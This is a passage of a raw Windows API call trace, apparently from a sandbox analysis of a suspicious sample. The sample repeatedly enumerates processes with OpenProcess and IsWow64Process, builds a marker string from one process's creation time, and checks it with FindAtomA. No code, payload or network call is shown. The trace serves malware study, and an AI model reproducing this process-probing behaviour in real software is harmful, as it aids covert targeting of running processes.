	[0081.186] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x35c
	[0081.186] IsWow64Process (in: hProcess=0x35c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.186] CloseHandle (hObject=0x35c) returned 1
	[0081.186] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x35c
	[0081.186] IsWow64Process (in: hProcess=0x35c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.186] CloseHandle (hObject=0x35c) returned 1
	[0081.186] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x35c
	[0081.186] IsWow64Process (in: hProcess=0x35c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.186] CloseHandle (hObject=0x35c) returned 1
	[0081.186] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x35c
	[0081.186] IsWow64Process (in: hProcess=0x35c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.186] CloseHandle (hObject=0x35c) returned 1
	[0081.187] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x35c
	[0081.187] IsWow64Process (in: hProcess=0x35c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.187] CloseHandle (hObject=0x35c) returned 1
	[0081.187] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x35c
	[0081.187] IsWow64Process (in: hProcess=0x35c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.187] CloseHandle (hObject=0x35c) returned 1
	[0081.187] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0081.187] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x35c
	[0081.187] IsWow64Process (in: hProcess=0x35c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.187] CloseHandle (hObject=0x35c) returned 1
	[0081.187] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x35c
	[0081.187] IsWow64Process (in: hProcess=0x35c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.187] CloseHandle (hObject=0x35c) returned 1
	[0081.187] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x35c
	[0081.187] IsWow64Process (in: hProcess=0x35c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.187] CloseHandle (hObject=0x35c) returned 1
	[0081.188] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0081.188] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x35c
	[0081.188] IsWow64Process (in: hProcess=0x35c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.188] CloseHandle (hObject=0x35c) returned 1
	[0081.188] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x35c
	[0081.188] IsWow64Process (in: hProcess=0x35c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.188] CloseHandle (hObject=0x35c) returned 1
	[0081.188] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x35c
	[0081.188] IsWow64Process (in: hProcess=0x35c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.188] CloseHandle (hObject=0x35c) returned 1
	[0081.188] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x35c
	[0081.188] IsWow64Process (in: hProcess=0x35c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.188] CloseHandle (hObject=0x35c) returned 1
	[0081.188] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x35c
	[0081.188] IsWow64Process (in: hProcess=0x35c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.188] CloseHandle (hObject=0x35c) returned 1
	[0081.188] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x35c
	[0081.189] IsWow64Process (in: hProcess=0x35c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.189] CloseHandle (hObject=0x35c) returned 1
	[0081.189] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x35c
	[0081.189] IsWow64Process (in: hProcess=0x35c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.189] CloseHandle (hObject=0x35c) returned 1
	[0081.189] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x35c
	[0081.189] IsWow64Process (in: hProcess=0x35c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.189] CloseHandle (hObject=0x35c) returned 1
	[0081.189] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x35c
	[0081.189] IsWow64Process (in: hProcess=0x35c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.189] CloseHandle (hObject=0x35c) returned 1
	[0081.189] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x35c
	[0081.189] IsWow64Process (in: hProcess=0x35c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.189] CloseHandle (hObject=0x35c) returned 1
	[0081.189] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x35c
	[0081.189] IsWow64Process (in: hProcess=0x35c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.189] CloseHandle (hObject=0x35c) returned 1
	[0081.189] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x35c
	[0081.189] IsWow64Process (in: hProcess=0x35c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.190] CloseHandle (hObject=0x35c) returned 1
	[0081.190] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x35c
	[0081.190] IsWow64Process (in: hProcess=0x35c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.190] CloseHandle (hObject=0x35c) returned 1
	[0081.190] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x35c
	[0081.190] IsWow64Process (in: hProcess=0x35c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.190] CloseHandle (hObject=0x35c) returned 1
	[0081.190] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x35c
	[0081.190] IsWow64Process (in: hProcess=0x35c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.190] CloseHandle (hObject=0x35c) returned 1
	[0081.190] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x35c
	[0081.190] IsWow64Process (in: hProcess=0x35c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.190] CloseHandle (hObject=0x35c) returned 1
	[0081.190] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x35c
	[0081.190] IsWow64Process (in: hProcess=0x35c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.190] CloseHandle (hObject=0x35c) returned 1
	[0081.190] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x35c
	[0081.190] IsWow64Process (in: hProcess=0x35c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.190] CloseHandle (hObject=0x35c) returned 1
	[0081.191] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x35c
	[0081.191] IsWow64Process (in: hProcess=0x35c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.191] CloseHandle (hObject=0x35c) returned 1
	[0081.191] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x35c
	[0081.191] IsWow64Process (in: hProcess=0x35c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.191] CloseHandle (hObject=0x35c) returned 1
	[0081.191] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x35c
	[0081.191] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0081.191] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0081.191] GetProcessTimes (in: hProcess=0x35c, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0081.192] wsprintfA (in: param_1=0x73be78, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0081.192] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0081.192] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0081.192] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0081.192] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0081.192] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0081.192] CloseHandle (hObject=0x35c) returned 1
	[0081.192] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0081.193] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0081.193] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x35c
	[0081.193] IsWow64Process (in: hProcess=0x35c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.193] CloseHandle (hObject=0x35c) returned 1
	[0081.281] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0081.281] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0081.281] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0081.281] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0081.282] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0081.282] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0081.282] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0081.282] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0081.282] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0081.282] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0081.282] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0081.282] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0081.282] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0081.283] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0081.283] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0081.283] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0081.283] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0081.283] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0081.283] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x35c
	[0081.283] IsWow64Process (in: hProcess=0x35c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.283] CloseHandle (hObject=0x35c) returned 1
	[0081.283] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0081.283] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0081.283] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x35c
	[0081.283] IsWow64Process (in: hProcess=0x35c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.283] CloseHandle (hObject=0x35c) returned 1
	[0081.284] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0081.284] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x35c
	[0081.284] IsWow64Process (in: hProcess=0x35c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.284] CloseHandle (hObject=0x35c) returned 1
	[0081.284] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x35c
	[0081.284] IsWow64Process (in: hProcess=0x35c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.284] CloseHandle (hObject=0x35c) returned 1
	[0081.284] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x35c
	[0081.284] IsWow64Process (in: hProcess=0x35c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.284] CloseHandle (hObject=0x35c) returned 1
	[0081.284] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x35c
	[0081.284] IsWow64Process (in: hProcess=0x35c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.284] CloseHandle (hObject=0x35c) returned 1
	[0081.284] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x35c
	[0081.284] IsWow64Process (in: hProcess=0x35c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.284] CloseHandle (hObject=0x35c) returned 1
	[0081.285] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x35c
	[0081.285] IsWow64Process (in: hProcess=0x35c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.285] CloseHandle (hObject=0x35c) returned 1
	[0081.285] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0081.285] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x35c
	[0081.285] IsWow64Process (in: hProcess=0x35c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.285] CloseHandle (hObject=0x35c) returned 1
	[0081.285] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x35c
	[0081.285] IsWow64Process (in: hProcess=0x35c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.285] CloseHandle (hObject=0x35c) returned 1
	[0081.285] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x35c
	[0081.285] IsWow64Process (in: hProcess=0x35c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.285] CloseHandle (hObject=0x35c) returned 1
	[0081.285] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0081.285] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x35c
	[0081.285] IsWow64Process (in: hProcess=0x35c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.286] CloseHandle (hObject=0x35c) returned 1
	[0081.286] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x35c
	[0081.286] IsWow64Process (in: hProcess=0x35c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.286] CloseHandle (hObject=0x35c) returned 1
	[0081.286] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x35c
	[0081.286] IsWow64Process (in: hProcess=0x35c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.286] CloseHandle (hObject=0x35c) returned 1
	[0081.286] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x35c
	[0081.286] IsWow64Process (in: hProcess=0x35c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.286] CloseHandle (hObject=0x35c) returned 1
	[0081.286] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x35c
	[0081.286] IsWow64Process (in: hProcess=0x35c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.286] CloseHandle (hObject=0x35c) returned 1
	[0081.286] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x35c
	[0081.286] IsWow64Process (in: hProcess=0x35c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.286] CloseHandle (hObject=0x35c) returned 1
	[0081.286] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x35c
	[0081.286] IsWow64Process (in: hProcess=0x35c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.286] CloseHandle (hObject=0x35c) returned 1
	[0081.287] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x35c
	[0081.287] IsWow64Process (in: hProcess=0x35c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.287] CloseHandle (hObject=0x35c) returned 1
	[0081.287] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x35c
	[0081.287] IsWow64Process (in: hProcess=0x35c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.287] CloseHandle (hObject=0x35c) returned 1
	[0081.287] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x35c
	[0081.287] IsWow64Process (in: hProcess=0x35c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.287] CloseHandle (hObject=0x35c) returned 1
	[0081.287] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x35c
	[0081.287] IsWow64Process (in: hProcess=0x35c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.287] CloseHandle (hObject=0x35c) returned 1
	[0081.287] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x35c
	[0081.287] IsWow64Process (in: hProcess=0x35c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.287] CloseHandle (hObject=0x35c) returned 1
	[0081.288] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x35c
	[0081.288] IsWow64Process (in: hProcess=0x35c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.288] CloseHandle (hObject=0x35c) returned 1
	[0081.288] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x35c
	[0081.288] IsWow64Process (in: hProcess=0x35c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.288] CloseHandle (hObject=0x35c) returned 1
	[0081.288] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x35c
	[0081.288] IsWow64Process (in: hProcess=0x35c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.288] CloseHandle (hObject=0x35c) returned 1
	[0081.288] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x35c
	[0081.288] IsWow64Process (in: hProcess=0x35c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.288] CloseHandle (hObject=0x35c) returned 1
	[0081.288] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x35c
	[0081.288] IsWow64Process (in: hProcess=0x35c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.288] CloseHandle (hObject=0x35c) returned 1
	[0081.288] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x35c
	[0081.288] IsWow64Process (in: hProcess=0x35c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.288] CloseHandle (hObject=0x35c) returned 1
	[0081.288] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x35c
	[0081.288] IsWow64Process (in: hProcess=0x35c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.289] CloseHandle (hObject=0x35c) returned 1
	[0081.289] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x35c
	[0081.289] IsWow64Process (in: hProcess=0x35c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.289] CloseHandle (hObject=0x35c) returned 1
	[0081.289] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x35c
	[0081.289] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0081.289] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0081.289] GetProcessTimes (in: hProcess=0x35c, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0081.289] wsprintfA (in: param_1=0x73be78, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0081.290] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0081.290] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0081.290] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0081.290] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0081.290] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0081.290] CloseHandle (hObject=0x35c) returned 1
	[0081.290] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0081.290] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0081.290] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x35c
	[0081.290] IsWow64Process (in: hProcess=0x35c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.290] CloseHandle (hObject=0x35c) returned 1
	[0081.362] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0081.362] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0081.362] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0081.362] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0081.362] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0081.363] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0081.363] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0081.363] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0081.363] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0081.363] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0081.363] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0081.363] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0081.363] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0081.363] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0081.363] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0081.364] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0081.364] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0081.364] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0081.364] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x35c
	[0081.364] IsWow64Process (in: hProcess=0x35c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.364] CloseHandle (hObject=0x35c) returned 1
	[0081.364] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0081.364] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0081.364] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x35c
	[0081.364] IsWow64Process (in: hProcess=0x35c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.364] CloseHandle (hObject=0x35c) returned 1
	[0081.364] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0081.365] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x35c
	[0081.365] IsWow64Process (in: hProcess=0x35c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.365] CloseHandle (hObject=0x35c) returned 1
	[0081.365] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x35c
	[0081.365] IsWow64Process (in: hProcess=0x35c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.365] CloseHandle (hObject=0x35c) returned 1
	[0081.365] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x35c
	[0081.365] IsWow64Process (in: hProcess=0x35c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.365] CloseHandle (hObject=0x35c) returned 1
	[0081.365] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x35c
	[0081.365] IsWow64Process (in: hProcess=0x35c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.365] CloseHandle (hObject=0x35c) returned 1
	[0081.365] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x35c
	[0081.365] IsWow64Process (in: hProcess=0x35c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.365] CloseHandle (hObject=0x35c) returned 1
	[0081.365] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x35c
	[0081.365] IsWow64Process (in: hProcess=0x35c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.365] CloseHandle (hObject=0x35c) returned 1
	[0081.366] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0081.366] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x35c
	[0081.366] IsWow64Process (in: hProcess=0x35c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.366] CloseHandle (hObject=0x35c) returned 1
	[0081.366] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x35c
	[0081.366] IsWow64Process (in: hProcess=0x35c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0081.366] CloseHandle (hObject=0x35c) returned 1
	[0081.366] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x35c
